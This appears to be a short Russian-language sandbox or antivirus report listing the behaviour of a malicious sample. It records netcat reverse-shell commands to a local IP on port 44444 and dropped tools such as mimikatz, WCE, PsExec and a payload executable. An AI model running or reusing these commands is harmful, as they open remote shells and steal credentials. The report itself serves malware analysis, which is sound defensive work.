Техническая информация
- '%TEMP%\nsm2.tmp\nc.exe' -e cmd.exe 192.168.169.136 44444
- '%TEMP%\nsm2.tmp\nc.exe' /c nc.exe -e cmd.exe 192.168.169.136 44444
- '%TEMP%\nsm2.tmp\ns4.tmp' %TEMP%\nst3.tmp.bat
- '%TEMP%\nsm2.tmp\payload.exe'
- '<SYSTEM32>\cmd.exe' /c %TEMP%\nst3.tmp.bat
- <SYSTEM32>\cmd.exe
- %TEMP%\nsm2.tmp\psexec.exe
- %TEMP%\nsm2.tmp\nc.exe
- %TEMP%\nsm2.tmp\ns4.tmp
- %TEMP%\nsm2.tmp\wce.exe
- %TEMP%\nsm2.tmp\mimilib.dll
- %TEMP%\nsm2.tmp\mimidrv.sys
- %TEMP%\nsm2.tmp\dexter.exe
- %TEMP%\nsm2.tmp\mimikatz.exe
- %TEMP%\nsm2.tmp\nsExec.dll
- %TEMP%\nsm2.tmp\payload.exe
- %TEMP%\nsm2.tmp\python27.dll
- %TEMP%\nsm2.tmp\_hashlib.pyd
- %TEMP%\nsm2.tmp\bz2.pyd
- %TEMP%\nsm2.tmp\w9xpopen.exe
- %TEMP%\nst3.tmp.bat
- %TEMP%\nsm2.tmp\select.pyd
- %TEMP%\nsm2.tmp\unicodedata.pyd
- '<IP-адрес в локальной сети>':44444